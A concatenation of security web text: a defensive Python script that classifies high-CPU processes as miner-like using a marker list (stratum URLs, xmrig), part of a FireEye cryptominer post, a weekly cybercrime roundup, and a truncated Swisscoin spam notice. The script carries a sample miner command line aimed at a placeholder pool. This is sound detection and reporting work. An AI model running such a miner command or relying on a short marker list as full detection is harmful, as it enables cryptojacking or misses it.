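The shell function in Figure 14 kills whatever consumes the most CPU. A defender looking at the same process table should not copy that logic blindly, because a legitimate batch job can look identical on the CPU column alone. The Python below is an added example, not FireEye’s code or part of the original post: it parses constructed `ps -eo pid,pcpu,comm,args` output (process names and paths are placeholders) and separates high-CPU processes whose command line carries a miner marker from those that merely need review. XMRig is named in the post; the stratum URL scheme and the cryptonight algorithm name are assumed markers, not values quoted from it.

```python
# Constructed `ps -eo pid,pcpu,comm,args` output; process names and paths are
# placeholders, not observations from the post.
SAMPLE_PS = """\
  PID %CPU COMMAND         COMMAND
    1  0.0 systemd         /sbin/init
  842  1.2 java            /opt/weblogic/jdk/bin/java -Dweblogic.Name=AdminServer
 2107 97.5 updatesvc       /tmp/updatesvc -o stratum+tcp://pool.example.test:3333 -u WALLET-PLACEHOLDER
 2211 45.0 ffmpeg          /usr/bin/ffmpeg -i in.mp4 out.mkv
 2300  0.3 sshd            /usr/sbin/sshd -D
"""

# Substrings that mark a command line as miner-like. XMRig is named in the
# post; the stratum URL scheme and algorithm name are assumed conventions.
MINER_MARKERS = ("stratum+tcp://", "stratum+ssl://", "xmrig", "cryptonight")


def parse_ps(ps_text):
    """Turn ps output into rows; skips the header and tolerates blank lines."""
    rows = []
    for line in ps_text.splitlines()[1:]:
        if not line.strip():
            continue
        pid, pcpu, comm, args = line.split(None, 3)
        rows.append({"pid": int(pid), "cpu": float(pcpu), "comm": comm, "args": args})
    return rows


def classify_high_cpu(rows, threshold=80.0):
    """Return (pid, verdict) for processes at or above the CPU threshold.
    'miner-like' when the command line carries a miner marker; otherwise
    'review', because a busy process is not evidence on its own."""
    verdicts = []
    for row in rows:
        if row["cpu"] < threshold:
            continue
        args = row["args"].lower()
        verdict = "miner-like" if any(m in args for m in MINER_MARKERS) else "review"
        verdicts.append((row["pid"], verdict))
    return verdicts


if __name__ == "__main__":
    for pid, verdict in classify_high_cpu(parse_ps(SAMPLE_PS), threshold=40.0):
        print(pid, verdict)
```

With the threshold lowered to 40% the ffmpeg job is surfaced as “review” rather than “miner-like”, which is exactly the distinction the malware’s own kill loop does not make.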


Use of cryptocurrency mining malware is a popular tactic leveraged by financially motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, which illustrates the potential profitability behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner, so that cyber criminals maximize their reach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

Indicators of Compromise

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

For starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financials Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their name, address, and account numbers.
  • Other notable events: Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.


Cyber Risk Trends From the Past Week

A federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods. It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.


Swisscoin [SIC] cryptocurrency spam

Swisscoin is a fairly low-volume self-styled cryptocurrency that has been the target of a Necurs-based spam run starting on Saturday 13th January, and increasing in volume to huge levels on Monday.

From: Florine Fray [Fray.419@redacted.tld]
Date: 15 January 2018 at 10:51
Subject: Could this digital currency actually make you a millionaire?

Every once in a while, an opportunity comes